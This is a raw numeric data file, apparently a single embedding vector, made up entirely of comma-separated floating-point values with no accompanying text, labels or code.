0.02112385258078575, -0.01182183064520359, -0.03102310188114643, 0.00220687803812325, 0.004229679238051176, -0.039466097950935364, -0.01466070581227541, -0.014128928072750568, 0.005996817722916603, 0.006139989010989666, 0.0164932943880558, -0.01585516147315502, -0.029108701273798943, -0.0016546471742913127, 0.02266191691160202, 0.003896295325830579, 0.007808953057974577, -0.017409589141607285, -0.014677068218588829, -0.006430421490222216, 0.01153548900038004, 0.004786000587046146, 0.0010134459007531404, 0.02491992898285389, -0.02217104658484459, -0.0027161575853824615, 0.025803497061133385, -0.02190924808382988, 0.002231421647593379, -0.006139989010989666, -0.0013120595831423998, 0.009105673059821129, 0.010676463134586811, 0.03226664289832115, 0.003511779010295868, 0.018653130158782005, 0.006639041937887669, -0.013040829449892044, -0.014873417094349861, 0.0009648699779063463, 0.012770849280059338, 0.01668146252632141, -0.010602831840515137, -0.002795924199745059, 0.005133701488375664, 0.0014992044307291508, 0.007931671105325222, 0.021434737369418144, 0.049479883164167404, -0.00576774450019002, 0.026032570749521255, 0.0024809481110423803, -0.006139989010989666, 0.009449283592402935, 0.015159759670495987, -0.019225815311074257, 0.012484507635235786, 0.0034586014226078987, 0.01991303451359272, -0.05357048287987709, 0.0029636388644576073, -0.01131459604948759, 0.02243284322321415, 0.014767061918973923, -0.02150018699467182, -0.00011945827282033861, 0.0313994362950325, 0.028977802023291588, -0.02763608656823635, -0.03475372865796089, 0.006733125541359186, -0.004113097209483385, -0.009048404172062874, 0.047941818833351135, -0.005910915322601795, -0.008712975308299065, 0.053243234753608704, -0.009751987643539906, 0.024838116019964218, -0.006348609458655119, -0.028323305770754814, -0.0035404132213443518, 0.008426633663475513, 0.021663811057806015, -0.012239071540534496, -0.023349137976765633, 0.00014010301674716175, -0.019716685637831688, 0.030548593029379845, 0.011543669737875462, 0.015675174072384834, 0.022481931373476982, -0.00008999317651614547, 0.003620180068537593, -0.0028900080360472202, -0.015249752439558506, 0.01739322580397129, -0.023856371641159058, 0.008647525683045387, -0.021581999957561493, 0.014047116041183472, -0.010398302227258682, 0.013899855315685272, -0.02081296779215336, -0.02352912537753582, -0.008361184038221836, -0.012599044479429722, 0.006266797427088022, 0.015004316344857216, -0.03117036260664463, -0.0004993087495677173, 0.011126428842544556, -0.0230055283755064, -0.0019522382644936442, -0.003450420219451189, 0.011110066436231136, 0.0025893491692841053, -0.019978484138846397, 0.015372470021247864, 0.0020964317955076694, 0.002961593447253108, 0.010684643872082233, -0.005739110056310892, 0.028519654646515846, 0.018882203847169876, -0.004790091421455145, -0.01133095845580101, 0.0002837852807715535, -0.007109460886567831, 0.0003727558068931103, 0.005092795472592115, -0.02879781648516655, -0.005555033218115568, 0.0033195209689438343, 0.011682750657200813, -0.0020749561954289675, -0.019471250474452972, -0.0001160707397502847, 0.005493674427270889, 0.022596467286348343, -0.0022723276633769274, 0.0164196640253067, 0.01603514701128006, -0.00011102140706498176, 0.012738124467432499, -0.011249146424233913, -0.009269297122955322, 0.049447160214185715, 0.006471327506005764, -0.005833194125443697, 0.017835011705756187, -0.042444054037332535, 0.0010093552991747856, -0.00656950194388628, -0.0056695700623095036, 0.0032193013466894627, -0.026817966252565384, 0.010398302227258682, -0.009105673059821129, 0.011126428842544556, -0.002110749017447233, 0.0011187788331881166, -0.012852661311626434, -0.0027836523950099945, 0.021369287744164467, 0.03707718849182129, -0.0280778706073761, 0.017376864328980446, -0.003873797133564949, -0.029354136437177658, -0.02014210820198059, -0.004286947660148144, -0.007792590651661158, 0.021058402955532074, -0.002718203002586961, 0.0012772894697263837, -0.0192421767860651, 0.01780228689312935, -0.0006135898292995989, -0.020911140367388725, -0.008078932762145996, -0.028208769857883453, -0.00744488975033164, 0.022465568035840988, 0.0024052720982581377, -0.02014210820198059, 0.017458675429224968, -0.025427162647247314, -0.025950759649276733, 0.03985879570245743, -0.003487235400825739, -0.031448524445295334, 0.015707898885011673, 0.004082417581230402, 0.023218238726258278, 0.008942048996686935, 0.006189076229929924, 0.027848796918988228, 0.014627980999648571, -0.022711005061864853, 0.022792816162109375, 0.005698204040527344, 0.03426285460591316, -0.028290580958127975, -0.010341034270823002, -0.0025300353299826384, 0.0007485795649699867, -0.004925081040710211, 0.007645329460501671, 0.0012149078538641334, 0.010831905528903008, 0.012132716365158558, 0.01426800899207592, 0.006405877880752087, 0.00520324194803834, -0.04784364253282547, -0.00048524729209020734, -0.003845162922516465, -0.008042117580771446, -0.01101189199835062, -0.014668887481093407, -0.024478143081068993, 0.027472462505102158, 0.020796604454517365, 0.02051844447851181, -0.006090901792049408, 0.010488294996321201, 0.0014756835298612714, 0.003419740591198206, 0.002493219915777445, -0.00395356398075819, -0.01768774911761284, -0.016951441764831543, 0.02491992898285389, -0.00688856840133667, 0.0016873719869181514, -0.00220687803812325, 0.006381334271281958, 0.032283004373311996, -0.0018775848438963294, 0.0041355956345796585, 0.0013928489061072469, -0.005407771561294794, 0.01852223090827465, -0.014979773201048374, 0.012738124467432499, -0.023627299815416336, 0.003182485932484269, -0.021238388493657112, -0.015642449259757996, 0.02037118189036846, -0.007792590651661158, -0.02382364682853222, 0.027390649542212486, 0.005587758030742407, -0.026507079601287842, -0.006144079379737377, 0.014546169899404049, 0.005350503139197826, -0.01663237437605858, 0.002227331046015024, 0.01580607332289219, -0.02269464172422886, -0.0035015526227653027, -0.01507794763892889, 0.0030229524709284306, -0.015061585232615471, -0.012255433946847916, 0.02379092201590538, 0.005150063894689083, -0.00635269982740283, 0.008852056227624416, -0.0013273992808535695, 0.00907294824719429, 0.025394437834620476, -0.019471250474452972, -0.006978561636060476, 0.008475720882415771, -0.016231495887041092, -0.0035485944245010614, -0.0043687596917152405, 0.0016014694701880217, 0.011969092302024364, -0.001269108266569674, -0.0058536469005048275, 0.021860159933567047, 0.031006738543510437, -0.01351533830165863, 0.01668146252632141, -0.011928185820579529, -0.01402257289737463, -0.010414664633572102, 0.003853344125673175, 0.018947653472423553, -0.016836903989315033, 0.015707898885011673, 0.015822436660528183, 0.006900840438902378, -0.005567304790019989, -0.028699642047286034, -0.00021386162552516907, -0.01466070581227541, 0.021729260683059692, 0.00965381320565939, 0.003511779010295868, -0.02352912537753582, -0.04908718541264534, 0.011142791248857975, -0.0038901595398783684, -0.011290052905678749, -0.004127414431422949, 0.006761759985238314, -0.006225891411304474, 0.0013529655989259481, -0.04188773036003113, -0.027996057644486427, 0.009547458030283451, 0.00994015485048294, 0.0041110520251095295, -0.01660783216357231, -0.0031783953309059143, 0.03455737978219986, -0.03282296657562256, 0.041167788207530975, 0.0241672582924366, 0.026899777352809906, -0.022105596959590912, -0.024379968643188477, 0.0018469053320586681, 0.012869023717939854, 0.00884387455880642, -0.02066570520401001, -0.004209225997328758, -0.015765167772769928, 0.00465919217094779, 0.0022293764632195234, -0.002231421647593379, -0.020616618916392326, -0.006630860734730959, 0.0016464660875499249, -0.019471250474452972, -0.009154760278761387, 0.009473826736211777, 0.0032090747263282537, 0.0022211952600628138, -0.00008059757965384051, -0.007678053807467222, -0.009040223434567451, 0.015936972573399544, -0.006986742839217186, -0.025492612272500992, -0.018489506095647812, 0.013556244783103466, -0.006962199229747057, 0.0005936481757089496, -0.014276189729571342, 0.014979773201048374, 0.006913112010806799, 0.013539882376790047, -0.019454888999462128, 0.0018172485288232565, -0.010005604475736618, 0.02318551391363144, 0.0025320807471871376, -0.007952123880386353, -0.015364289283752441, 0.014431633055210114, -0.0015104536432772875, -0.026228919625282288, -0.018800392746925354, 0.003474963828921318, 0.025836221873760223, 0.010439207777380943, 0.013989848084747791, -0.02006029710173607, -0.012009997852146626, 0.012059085071086884, 0.046927351504564285, -0.006966289598494768, 0.033935606479644775, 0.003260207362473011, 0.003119081724435091, -0.004790091421455145, -0.0031354438979178667, -0.021860159933567047, -0.003843117505311966, 0.0019645101856440306, 0.020354820415377617, 0.00636088103055954, 0.028503293171525, 0.0063936058431863785, -0.005501855630427599, 0.004532383289188147, -0.003810392925515771, 0.026817966252565384, 0.010668281465768814, 0.013335351832211018, 0.004839178640395403, -0.01400621049106121, -0.013932579196989536, 0.01893129199743271, -0.004352397285401821, 0.030957652255892754, -0.0040619648061692715, 0.02454359270632267, 0.017033252865076065, 0.015249752439558506, 0.00962108839303255, 0.008197559975087643, -0.013335351832211018, -0.029255961999297142, 0.00012156748562119901, 0.006819028407335281, -0.006994924042373896, 0.007808953057974577, -0.018505869433283806, 0.010439207777380943, 0.005735019687563181, 0.003867661114782095, -0.00398219795897603, -0.02454359270632267, -0.008148472756147385, 0.00470418855547905, -0.0022252858616411686, -0.007035830058157444, -0.02544352412223816, 0.01368714403361082, -0.00714218569919467, -0.00438512209802866, 0.0013376257847994566, -0.007898946292698383, -0.002943185856565833, -0.0022825540509074926, -0.028323305770754814, 0.016354214400053024, -0.00740807456895709, 0.007612604647874832, 0.002427770523354411, 0.002707976382225752, -0.008152563124895096, -0.01840769499540329, 0.0012005907483398914, 0.001223089057020843, -0.02541079930961132, -0.004790091421455145, -0.014407088980078697, -0.0012097946600988507, 0.0030965832993388176, 0.00329906796105206, -0.0009035110124386847, -0.018211346119642258, 0.00234800367616117, -0.0025279901456087828, 0.002634345553815365, 0.028241494670510292, 0.0031354438979178667, 0.01565881259739399, -0.006205438636243343, 0.00247481232509017, 0.014398908242583275, 0.015282477252185345, -0.006004998926073313, -0.001212862553074956, 0.02118930220603943, -0.0005228296504355967, -0.002064729807898402, -0.010046510957181454, 0.01727868989109993, -0.012680856510996819, -0.011690931394696236, 0.031644873321056366, -0.018227707594633102, 0.021058402955532074, -0.0013621693942695856, -0.013032647781074047, -0.018227707594633102, 0.019634874537587166, -0.007011286448687315, 0.011658206582069397, 0.01319627184420824, -0.02521445043385029, -0.004871902987360954, 0.0057554724626243114, -0.021140214055776596, -0.006602226756513119, -0.01768774911761284, -0.01040648389607668, -0.006348609458655119, -0.0025463977362960577, -0.016885992139577866, -0.0032417995389550924, 0.028601467609405518, -0.0013263766886666417, 0.010774637572467327, 0.006336337421089411, -0.003560866229236126, -0.01799863576889038, -0.0015349972527474165, 0.028290580958127975, 0.0052646007388830185, -0.03504825010895729, 0.015503369271755219, -0.0023909551091492176, -0.025116275995969772, -0.002378683304414153, 0.0011085523292422295, 0.022711005061864853, -0.0028900080360472202, 0.03805893287062645, 0.012959017418324947, -0.0030515866819769144, -0.007330352906137705, 0.0006054086261428893, 0.02364366129040718, -0.0020043933764100075, 0.01580607332289219, 0.009506551548838615, 0.012582682073116302, 0.021860159933567047, -0.025950759649276733, 0.027848796918988228, 0.0035281414166092873, 0.012394514866173267, 0.01214089710265398, 0.004458752926439047, 0.0006923338514752686, -0.01844041980803013, 0.018653130158782005, 0.0025361713487654924, 0.015405194833874702, 0.00660631712526083, 0.007256722543388605, 0.0007853949791751802, -0.012198165990412235, -0.0031968029215931892, 0.0012435420649126172, -0.003239754354581237, 0.004646920133382082, -0.011789105832576752, -0.005465039983391762, 0.01901310309767723, -0.02055116929113865, -0.007117642089724541, 0.01603514701128006, 0.00604181457310915, 0.019978484138846397, 0.0016290809726342559, -0.020763879641890526, -0.007109460886567831, -0.02341458760201931, -0.02521445043385029, -0.005019164644181728, -0.002343913074582815, 0.011240965686738491, 0.007457161787897348, 0.013858948834240437, 0.014423451386392117, 0.004855541046708822, -0.014693430624902248, -0.000528709904756397, 0.02202378399670124, 0.019176727160811424, 0.001495113829150796, 0.026817966252565384, 0.0253289882093668, 0.00995651725679636, -0.007277175318449736, -0.011486401781439781, -0.0011555941309779882, -0.027685172855854034, -0.009441101923584938, -0.00858207605779171, 0.008099385537207127, -0.000017992242646869272, 0.0120836291462183, 0.01012832298874855, -0.015257934108376503, -0.001688394695520401, 0.025868946686387062, -0.015249752439558506, 0.015225209295749664, -0.00011875519703608006, -0.00017103816207963973, -0.008254828862845898, 0.015184302814304829, 0.007203544490039349, -0.0070317392237484455, -0.004683735780417919, 0.002568896161392331, 0.013989848084747791, -0.0021802892442792654, 0.011993635445833206, -0.010831905528903008, -0.012795393355190754, -0.010226497426629066, 0.019962122663855553, -0.019602149724960327, 0.02266191691160202, -0.004998711869120598, 0.0008186310878954828, -0.004618286155164242, 0.0038758423179388046, 0.0367499403655529, -0.014227102510631084, -0.004556926898658276, 0.014235284179449081, -0.007371258921921253, 0.017147790640592575, 0.013114459812641144, -0.030139531940221786, 0.002562760142609477, 0.010570107027888298, -0.013089916668832302, 0.01991303451359272, 0.004454662092030048, -0.010774637572467327, 0.0024789029266685247, 0.0030311336740851402, -0.019553061574697495, -0.004851450212299824, -0.010283765383064747, 0.005583667196333408, 0.009866524487733841, 0.0009137375163845718, 0.022563742473721504, -0.005559124052524567, -0.000037933914427412674, -0.005117339082062244, 0.00820574164390564, -0.011600938625633717, -0.0010625330032780766, -0.007583970203995705, 0.016820542514324188, -0.0018571318360045552, 0.013278083875775337, 0.00469600735232234, -0.0072730849497020245, -0.009809255599975586, 0.004225588403642178, 0.036422692239284515, -0.011060979217290878, 0.015478826127946377, 0.0032438449561595917, 0.0051909699104726315, 0.0013734186068177223, 0.023480037227272987, 0.008340731263160706, 0.005591848399490118, 0.009236572310328484, -0.0055959392338991165, 0.02665434218943119, -0.008778424933552742, 0.006148170214146376, -0.002231421647593379, -0.005219603888690472, 0.012451782822608948, 0.007064464036375284, 0.021238388493657112, -0.004998711869120598, -0.003931065555661917, 0.007686235010623932, 0.0057513820938766, -0.027488823980093002, 0.006242253817617893, 0.021516550332307816, -0.0015953335678204894, -0.010848267935216427, -0.03079402819275856, 0.005706385243684053, -0.009040223434567451, -0.03337928652763367, 0.01953670009970665, 0.01724596507847309, -0.002732519991695881, -0.003926974721252918, -0.002319369465112686, -0.0031783953309059143, 0.0018837207462638617, -0.014505263417959213, 0.008647525683045387, 0.013646237552165985, 0.00818937923759222, -0.02871600352227688, -0.0018980378517881036, -0.007473524194210768, -0.00019877753220498562, -0.00805438868701458, -0.021172938868403435, -0.004278766456991434, 0.02074751816689968, -0.0000830263743409887, 0.0034626920241862535, -0.010308309458196163, -0.006152260582894087, -0.01776956208050251, 0.012263615615665913, 0.017867736518383026, -0.0010032193968072534, 0.010071054100990295, 0.01664055697619915, 0.028323305770754814, 0.006414059083908796, -0.01428437139838934, 0.01724596507847309, -0.002217104658484459, 0.018800392746925354, 0.00412332359701395, 0.01614968478679657, 0.004761456977576017, -0.0059763649478554726, 0.023889096453785896, -0.006426330655813217, 0.010136503726243973, -0.02529626339673996, -0.008140292018651962, -0.011731837876141071, 0.006115445401519537, -0.00850844569504261, -0.0031640781089663506, -0.017115065827965736, -0.002542307134717703, -0.015446101315319538, -0.0069581083953380585, -0.008369364775717258, 0.002795924199745059, 0.0010758275166153908, 0.0046673733741045, -0.0007951101288199425, -0.009735625237226486, -0.0053382315672934055, -0.01131459604948759, 0.015225209295749664, 0.0027795620262622833, -0.009735625237226486, 0.0003034713154193014, 0.03295386582612991, 0.000676994095556438, -0.01716415211558342, 0.00022971269208937883, -0.0049332622438669205, 0.005694113671779633, 0.007890765555202961, 0.016476932913064957, -0.0028961440548300743, -0.005857737734913826, -0.002738656010478735, 0.012173621915280819, -0.008696612901985645, -0.003010680666193366, -0.011789105832576752, -0.008426633663475513, -0.009154760278761387, 0.011666388250887394, 0.0015564728528261185, 0.014456176199018955, -0.003147715702652931, 0.0025954849552363157, 0.0018233844311907887, -0.023218238726258278, -0.008402089588344097, -0.004769638180732727, -0.001046682009473443, 0.011216421611607075, 0.003331792773678899, 0.02902689017355442, -0.011985454708337784, 0.01183819305151701, -0.011854555457830429, -0.00164237548597157, -0.018014997243881226, -0.0367499403655529, -0.007035830058157444, 0.007776228245347738, 0.003489280818030238, 0.0011433223262429237, -0.0006611430435441434, -0.013368076644837856, -0.000058706486015580595, -0.004634648561477661, 0.005170517135411501, -0.004270585253834724, 0.006422240287065506, -0.01878402940928936, 0.0003479565493762493, -0.005763653665781021, 0.018702218309044838, -0.003888114122673869, 0.019438525661826134, 0.008234375156462193, -0.01263176929205656, 0.012337245978415012, 0.013678962364792824, -0.0025504883378744125, -0.02676887810230255, -0.00036892088246531785, 0.019373076036572456, 0.014030753634870052, 0.020338457077741623, 0.006356790661811829, -0.01678781770169735, -0.003556775627657771, 0.009293840266764164, -0.011813649907708168, 0.022334668785333633, 0.008982955478131771, -0.0012425193563103676, 0.012738124467432499, 0.0022886900696903467, -0.02526353858411312, 0.003006590064615011, -0.005141882691532373, 0.0072730849497020245, 0.010635556653141975, -0.00579637847840786, -0.009506551548838615, 0.014668887481093407, -0.005182788707315922, -0.003395196981728077, -0.004786000587046146, 0.012779030948877335, -0.017000528052449226, 0.001441936125047505, -0.009220209904015064, 0.00908931065350771, -0.00044434130541048944, 0.002278463449329138, -0.02905961498618126, -0.001966555370017886, -0.012304521165788174, 0.003041360294446349, -0.03802620619535446, -0.00831618718802929, 0.017213240265846252, 0.0007521588704548776, -0.010324671864509583, 0.005330050364136696, -0.011380045674741268, -0.01134732086211443, 0.0040353755466639996, 0.013016285374760628, 0.006549048703163862, 0.0038901595398783684, 0.010136503726243973, 0.007502158172428608, -0.008348912000656128, -0.003704037284478545, -0.018342245370149612, -0.010823724791407585, 0.0008835693588480353, 0.016918716952204704, 0.006291341036558151, -0.0014695476274937391, -0.007575789000838995, -0.011093704029917717, 0.0079234903678298, 0.016501475125551224, 0.01630512624979019, 0.004900537431240082, 0.005297325551509857, 0.0012599044712260365, -0.024641767144203186, 0.0014296643203124404, -0.012623587623238564, -0.007195363286882639, -0.001660783076658845, -0.026507079601287842, 0.008974773809313774, 0.0005588780622929335, -0.00656950194388628, 0.013498975895345211, -0.009081128984689713, -0.014317096211016178, -0.013179909437894821, -0.003264297964051366, -0.020469356328248978, 0.00015237480693031102, 0.0036754030734300613, -0.001342739094980061, -0.018538594245910645, -0.007543064188212156, -0.011478220112621784, 0.011527307331562042, -0.007988939993083477, -0.01999484747648239, 0.0269161406904459, 0.004364668857306242, 0.011060979217290878, -0.007898946292698383, 0.03192303329706192, -0.01938943937420845, 0.03485190123319626, -0.006745397578924894, 0.0007807930815033615, 0.0005634800181724131, -0.017851373180747032, 0.013392620719969273, 0.011494582518935204, 0.01588788628578186, -0.0120836291462183, 0.015004316344857216, -0.002022801199927926, 0.003204984124749899, 0.007522611413151026, 0.00034130935091525316, 0.013008104637265205, -0.0020565486047416925, 0.024069083854556084, 0.0028879628516733646, 0.0017354366136714816, -0.004716460593044758, 0.002319369465112686, 0.010226497426629066, -0.01182183064520359, -0.010210135020315647, 0.0005870009190402925, 0.01904582791030407, -0.02778334729373455, -0.028061507269740105, 0.001727255410514772, -0.015756987035274506, -0.0164196640253067, 0.001780433114618063, 0.0037694869097322226, -0.023660022765398026, -0.003755169687792659, -0.00772714102640748, 0.013908036053180695, -0.01313900388777256, 0.006058176979422569, 0.017115065827965736, 0.020076658576726913, 0.025394437834620476, -0.010471932590007782, -0.0006146124796941876, -0.02563987299799919, 0.01817862130701542, -0.027079764753580093, -0.0160678718239069, -0.002816377207636833, 0.007277175318449736, -0.007502158172428608, 0.005600029602646828, 0.0004893378936685622, 0.0029022798407822847, -0.0022293764632195234, -0.02153291180729866, -0.023970909416675568, -0.007993030361831188, -0.006009089760482311, -0.02292371541261673, -0.008721156977117062, 0.007489886600524187, -0.009490189142525196, -0.024756304919719696, 0.0056450264528393745, 0.0005343344528228045, 0.03056495450437069, -0.002683432772755623, -0.022007422521710396, 0.022236496210098267, -0.014554350636899471, -0.00035306980134919286, 0.01675509288907051, 0.007035830058157444, -0.007714869454503059, 0.011952729895710945, 0.0006125671789050102, -0.0017016890924423933, 0.008287553675472736, -0.021860159933567047, -0.0007874402799643576, 0.011183696798980236, -0.000997594790533185, -0.0014358002226799726, 0.0009081129683181643, -0.0024482232984155416, 0.02796333283185959, 0.004462843295186758, 0.010283765383064747, -0.014128928072750568, 0.01645238883793354, 0.007158548105508089, -0.01319627184420824, 0.010079235769808292, -0.01538065169006586, -0.017213240265846252, 0.011993635445833206, 0.0001628569734748453, -0.013670781627297401, -0.00413968600332737, -0.01232906524091959, 0.007330352906137705, -0.012378152459859848, 0.023545486852526665, 0.0035976816434413195, -0.009506551548838615, 0.015405194833874702, 0.020093021914362907, 0.013384439051151276, 0.008385727182030678, 0.010021966882050037, -0.0036917654797434807, -0.008434814400970936, 0.019405800849199295, 0.0069826520048081875, -0.0007112528546713293, 0.004847359843552113, -0.007473524194210768, -0.013867130503058434, -0.003867661114782095, -0.011625481769442558, -0.0050559802912175655, -0.015217027626931667, -0.02225285768508911, 0.01889856718480587, 0.002609801944345236, -0.0004959850921295583, -0.0018990605603903532, -0.0020504125859588385, -0.007714869454503059, 0.012517232447862625, -0.016436025500297546, -0.00525232870131731, -0.013482613489031792, -0.0058536469005048275, 0.020223921164870262, 0.004250132013112307, -0.029566848650574684, -0.002534125931560993, -0.03151397407054901, -0.006913112010806799, 0.01290993019938469, -0.0073876213282346725, -0.0027366105932742357, -0.015544275753200054, -0.01464434340596199, 0.011150971986353397, -0.008385727182030678, 0.022351032122969627, -0.011069160886108875, 0.017491400241851807, 0.016550563275814056, -0.007183091714978218, 0.010905536822974682, 0.01044738944619894, -0.013351714238524437, -0.00659813592210412, 0.0026711609680205584, 0.01377713680267334, 0.009841980412602425, 0.0286505538970232, -0.00261593796312809, -0.0037694869097322226, -0.007064464036375284, -0.010398302227258682, -0.0027304748073220253, -0.006921293213963509, -0.010349215008318424, 0.013261721469461918, -0.003231573151424527, -0.020682068541646004, -0.000010961526641040109, -0.002967729466035962, 0.0002643549523781985, -0.02570532262325287, 0.027112489566206932, -0.018505869433283806, 0.023970909416675568, -0.005391409154981375, 0.0031456705182790756, -0.04280402511358261, -0.0031497611198574305, -0.0038594799116253853, -0.0022682370617985725, -0.005820922087877989, -0.020845692604780197, -0.004129459615796804, -0.017867736518383026, -0.007522611413151026, 0.018538594245910645, 0.0007628966704942286, -0.002683432772755623, -0.020354820415377617, 0.007322171702980995, -0.0043933033011853695, 0.003949473146349192, 0.02078024297952652, -0.012942655012011528, -0.01780228689312935, -0.015838798135519028, -0.004859631415456533, -0.004794181790202856, 0.007522611413151026, -0.011093704029917717, -0.007919399067759514, 0.002237557666376233, -0.00026167050236836076, -0.023120064288377762, -0.01018559094518423, -0.016468750312924385, -0.003963790368288755, -0.007939852774143219, 0.008308006450533867, 0.0039453827776014805, -0.015388832427561283, 0.014709793031215668, -0.020387545228004456, 0.020714793354272842, -0.007342624943703413, 0.002806150820106268, 0.004323762841522694, -0.0087538817897439, -0.021631086245179176, 0.002908415859565139, -0.012590862810611725, 0.01991303451359272, 0.008070751093327999, 0.010480114258825779, -0.028846902772784233, 0.002763199619948864, 0.01668146252632141, 0.012852661311626434, -0.006585864350199699, 0.00017078249948099256, 0.013507157564163208, -0.01547064445912838, 0.004896446596831083, -0.016804179176688194, 0.011322777718305588, 0.006990833207964897, 0.04031694307923317, -0.027570636942982674, -0.0025402619503438473, -0.00908931065350771, 0.012492689304053783, 0.013588969595730305, -0.0017466857098042965, 0.028928715735673904, 0.006262706592679024, -0.0188167542219162, 0.005350503139197826, 0.009817437268793583, -0.0026179831475019455, 0.009334746748209, -0.005563214421272278, -0.014317096211016178, 0.010660100728273392, 0.011281871236860752, -0.020682068541646004, 0.009383833967149258, 0.0028756910469383, -0.007285356521606445, -0.005117339082062244, -0.006446783896535635, 0.010668281465768814, -0.013024467043578625, 0.0022150592412799597, -0.02168017439544201, 0.00769032584503293, -0.014120747335255146, -0.0003221346705686301, -0.013744411990046501, -0.0013100142823532224, 0.0006192143773660064, 0.004524202086031437, -0.0037838038988411427, 0.020469356328248978, -0.006581773515790701, 0.006099082995206118, 0.02514900080859661, 0.013588969595730305, -0.007260812912136316, -0.010872812010347843, 0.008614800870418549, -0.017327776178717613, -0.016280584037303925, 0.006283159833401442, -0.0044423905201256275, 0.021663811057806015, -0.021712899208068848, -0.006704491563141346, 0.014145290479063988, 0.016820542514324188, 0.018129533156752586, -0.012500870041549206, 0.02624528296291828, -0.0059763649478554726, -0.0015984014607965946, -0.032201193273067474, -0.011740018613636494, 0.006921293213963509, -0.010831905528903008, 0.009531095623970032, 0.00604181457310915, -0.013981666415929794, 0.00714218569919467, 0.013425345532596111, 0.0033624721691012383, -0.009383833967149258, 0.00856571365147829, -0.001106507028453052, 0.005653207655996084, 0.0054977647960186005, 0.0160678718239069, 0.0033604269847273827, -0.015503369271755219, 0.01791682280600071, -0.015707898885011673, -0.0015165895456448197, 0.009776530787348747, 0.02228558249771595, 0.00006151877460069954, 0.01134732086211443, -0.024559956043958664, -0.009784712456166744, -0.023921821266412735, 0.011928185820579529, 0.02955048531293869, -0.016951441764831543, -0.04031694307923317, -0.0215656366199255, -0.017458675429224968, 0.016157865524291992, 0.0010553745087236166, 0.0013233086792752147, -0.00849208328872919, 0.009040223434567451, 0.012427239678800106, -0.013834405690431595, 0.024592680856585503, -0.00769850704818964, 0.00037659076042473316, -0.005354593973606825, -0.006909021642059088, -0.0023316412698477507, -0.014767061918973923, -0.02074751816689968, -0.020845692604780197, 0.026932502165436745, 0.012566319666802883, 0.021140214055776596, 0.021598361432552338, -0.020763879641890526, -0.004781910218298435, 0.0008324368391185999, -0.016395119950175285, 0.013335351832211018, -0.0004223543219268322, -0.0047491854056715965, -0.006054086145013571, 0.01953670009970665, -0.021958334371447563, -0.016951441764831543, 0.01596151664853096, -0.009293840266764164, 0.01516794040799141, -0.0035281414166092873, -0.019323989748954773, 0.01102825440466404, -0.0015748805599287152, 0.010300127789378166, 0.03423013165593147, 0.021091127768158913, -0.006483599077910185, 0.013310808688402176, -0.020714793354272842, 0.018064085394144058, 0.019209451973438263, -0.0035015526227653027, 0.016272401437163353, -0.004241950809955597, -0.01690235361456871, 0.010619194246828556, -0.0006539844907820225, -0.00019545393297448754, -0.004642829764634371, -0.0024870841298252344, -0.0030086354818195105, -0.002967729466035962, -0.0012527458602562547, -0.00742443697527051, 0.001994166988879442, 0.002294825855642557, -0.050952497869729996, 0.009285659529268742, 0.003035224275663495, 0.009629270061850548, -0.015560638159513474, -0.009113853797316551, 0.028928715735673904, -0.009113853797316551, 0.0058536469005048275, 0.009572001174092293, 0.0016720322892069817, -0.0017160061979666352, -0.0027550184167921543, -0.016836903989315033, 0.004790091421455145, 0.006373153068125248, 0.011159153655171394, 0.0030556772835552692, 0.011952729895710945, 0.014202559366822243, -0.014480720274150372, -0.004145822022110224, -0.01655874401330948, 0.002714112401008606, 0.011846373789012432, -0.0188167542219162, 0.01209999155253172, -0.03135034814476967, -0.015028860419988632, -0.016362395137548447, -0.008144382387399673, 0.009416558779776096, 0.013597150333225727, -0.004830997437238693, 0.018800392746925354, -0.011429132893681526, -0.012999922968447208, 0.010651919059455395, -0.00526869110763073, 0.0019512156723067164, -0.014423451386392117, 0.013556244783103466, -0.020583894103765488, 0.0003924418124370277, 0.008070751093327999, -0.024903565645217896, 0.001329444581642747, -0.00800121109932661, 0.007702597416937351, -0.018473144620656967, -0.01214089710265398, -0.004241950809955597, 0.014497082680463791, -0.023103702813386917, -0.007911218330264091, 0.019094916060566902, 0.0014409134164452553, -0.032773878425359726, -0.0037899399176239967, -0.0022498294711112976, 0.0120836291462183, -0.023692747578024864, -0.019863948225975037, -0.009269297122955322, 0.00913021620362997, 0.028863266110420227, -0.004916899837553501, 0.010136503726243973, 0.010602831840515137, 0.013204453513026237, 0.012001817114651203, 0.0022477840539067984, 0.009473826736211777, 0.008434814400970936, -0.01020195335149765, -0.008046207949519157, 0.009154760278761387, 0.0032929321750998497, 0.0031947577372193336, -0.0003934644628316164, 0.0037899399176239967, 0.004810544196516275, -0.02179471030831337, 0.001850995933637023, -0.00546913081780076, -0.01125732809305191, -0.003112945705652237, 0.003186576534062624, -0.0009664039826020598, 0.005293234717100859, 0.006311793811619282, 0.011101885698735714, -0.003781758714467287, -0.01209999155253172, 0.008819331414997578, 0.013433526270091534, -0.020076658576726913, 0.005947730503976345, 0.006054086145013571, 0.004162184428423643, -0.001237406162545085, -0.03171032294631004, 0.0010032193968072534, -0.003249980742111802, 0.0010635557118803263, -0.016722368076443672, -0.019225815311074257, 0.00022153148893266916, -0.0006621656939387321, -0.007093098480254412, 0.018571319058537483, 0.017638662829995155, 0.023398226127028465, -0.013728049583733082, -0.012901748530566692, -0.017933186143636703, 0.011052798479795456, 0.009874705225229263, 0.0036815388593822718, 0.003988333977758884, -0.011813649907708168, -0.021958334371447563, -0.0046510109677910805, 0.00438512209802866, -0.004638738930225372, -0.014349821023643017, -0.00409468961879611, -0.007305809296667576, -0.043720319867134094, 0.0005583667661994696, 0.0063690622337162495, 0.024265432730317116, 0.021025678142905235, 0.0027161575853824615, -0.0013509202981367707, -0.025230813771486282, 0.005632754415273666, 0.009179303422570229, 0.013179909437894821, -0.0005212957039475441, -0.007199454121291637, -0.0009704945841804147, 0.024216344580054283, -0.006103173363953829, -0.0053627751767635345, -0.013580787926912308, 0.00852480810135603, 0.02740701287984848, -0.004495568107813597, 0.009498370811343193, -0.011756381019949913, -0.0072239977307617664, 0.016346033662557602, 0.004953715018928051, -0.02014210820198059, 0.023970909416675568, 0.009252934716641903, 0.007183091714978218, -0.00916294101625681, 0.007285356521606445, -0.006618588697165251, 0.020567530766129494, -0.014472538605332375, 0.016501475125551224, -0.0038410723209381104, -0.005677751265466213, 0.0020800696220248938, 0.005559124052524567, -0.005047799088060856, -0.0013652374036610126, -0.005861828103661537, 0.035964544862508774, -0.021091127768158913, -0.0026486627757549286, 0.013981666415929794, 0.0014869326259940863, -0.02048571966588497, -0.029043251648545265, -0.0002848079311661422, -0.01296719815582037, -0.0049823494628071785, 0.001565676648169756, 0.003207029541954398, -0.018473144620656967, -0.006168622989207506, 0.009514733217656612, -0.007420346140861511, 0.010619194246828556, -0.00008270679245470092, 